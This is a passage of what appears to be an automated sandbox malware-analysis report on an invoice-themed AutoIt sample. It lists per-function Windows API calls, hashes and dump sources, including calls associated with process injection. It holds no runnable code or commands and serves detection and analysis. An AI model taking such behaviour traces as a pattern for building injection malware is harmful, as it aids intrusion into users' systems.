                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                          • String ID: Line:
                                          • API String ID: 3942752672-1585850449
                                          • Opcode ID: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
                                          • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                          • Opcode Fuzzy Hash: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
                                          • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000), ref: 00E9D69B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E9D731
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E9D753
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1343224751.0000000000E9B000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E9B000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e9b000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                          • Instruction ID: e670834786fd508b406cd8eb65c8b955df3afe64779da82638a2c7de613a6e97
                                          • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                          • Instruction Fuzzy Hash: 1862F930A182589BEB24DFA4CC50BDEB376EF58304F1091A9D10DFB394E6799E81CB59
                                          APIs
                                            • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                          • _free.LIBCMT ref: 0043E263
                                          • _free.LIBCMT ref: 0043E2AA
                                            • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                          • API String ID: 2861923089-1757145024
                                          • Opcode ID: aaad6bcedd136023f92f981be4e473ea1aa388c68f80fcbb4218e136d78f71b3
                                          • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                          • Opcode Fuzzy Hash: aaad6bcedd136023f92f981be4e473ea1aa388c68f80fcbb4218e136d78f71b3
                                          • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                          • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                          • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                          • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                          • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                          APIs
                                            • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                            • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                            • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                          • _free.LIBCMT ref: 004696A2
                                          • _free.LIBCMT ref: 004696A9
                                          • _free.LIBCMT ref: 00469714
                                            • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                            • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                          • _free.LIBCMT ref: 0046971C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID:
                                          • API String ID: 1552873950-0
                                          • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                          • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                          • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                          • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                          • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                          • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                          • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                          APIs
                                          • SetFilePointerEx.KERNEL32 ref: 00B8B2BA
                                          • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00B8B2E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: File$PointerWrite
                                          • String ID:
                                          • API String ID: 539440098-0
                                          • Opcode ID: 2cea9c5fb16f1857870711d2aeb9b97fb0cefbbc55465093b196813f3ac4a826
                                          • Instruction ID: 2ce51495fcd799427865555304a6ec488e63eaf7eaed78259d6d8097b76bc78b
                                          • Opcode Fuzzy Hash: 2cea9c5fb16f1857870711d2aeb9b97fb0cefbbc55465093b196813f3ac4a826
                                          • Instruction Fuzzy Hash: 03314F6040C384AED711BF358859F2FBFE0EB96724F4885CDE4949A2B1D3B98908D757
                                          APIs
                                          • _memset.LIBCMT ref: 004044CF
                                            • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                            • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                            • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                          • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                          • String ID:
                                          • API String ID: 1378193009-0
                                          • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                          • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                          • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                          • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: AU3!P/I$EA06
                                          • API String ID: 4104443479-1914660620
                                          • Opcode ID: 16f5da041bfe5336b7d6228a32569345bac751845b8ec38fb7b22f9adfc250c8
                                          • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                          • Opcode Fuzzy Hash: 16f5da041bfe5336b7d6228a32569345bac751845b8ec38fb7b22f9adfc250c8
                                          • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                          APIs
                                          • _memset.LIBCMT ref: 0043EA39
                                          • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                            • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                            • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen_memset
                                          • String ID: X
                                          • API String ID: 3777226403-3081909835
                                          • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                          • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                          • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                          • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                          • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                          • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                          • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                          • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                          • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                          • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ComputerName
                                          • String ID:
                                          • API String ID: 3545744682-0
                                          • Opcode ID: 7671e1e6146474ba7e8fbaeb26d40d21179994397be753005d51d363d4bc1c61
                                          • Instruction ID: 82b23267d3b9f5b070bf7bf9c73f8903b87d02bd162ccd5d414a0347c0d34468
                                          • Opcode Fuzzy Hash: 7671e1e6146474ba7e8fbaeb26d40d21179994397be753005d51d363d4bc1c61
                                          • Instruction Fuzzy Hash: B121C4F16CD3446BD63567149C0ABB93AE5EFA3710F8844FAA9C8561E1DD642C0482A3
                                          APIs
                                          • _memset.LIBCMT ref: 00404370
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$_memset
                                          • String ID:
                                          • API String ID: 1505330794-0
                                          • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                          • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                          • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                          • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 00425733
                                            • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                            • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                          • __NMSG_WRITE.LIBCMT ref: 0042573A
                                            • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                            • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                            • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                            • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                            • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                          • RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                          • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                          • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                          • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                          APIs
                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                          • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                          • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                          • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                                          • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                          • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                                          APIs
                                          • _free.LIBCMT ref: 00468D1B
                                            • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                            • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                          • _free.LIBCMT ref: 00468D2C
                                          • _free.LIBCMT ref: 00468D3E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                          • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                                          • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                          • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                                          Strings
                                          Memory Dump Source
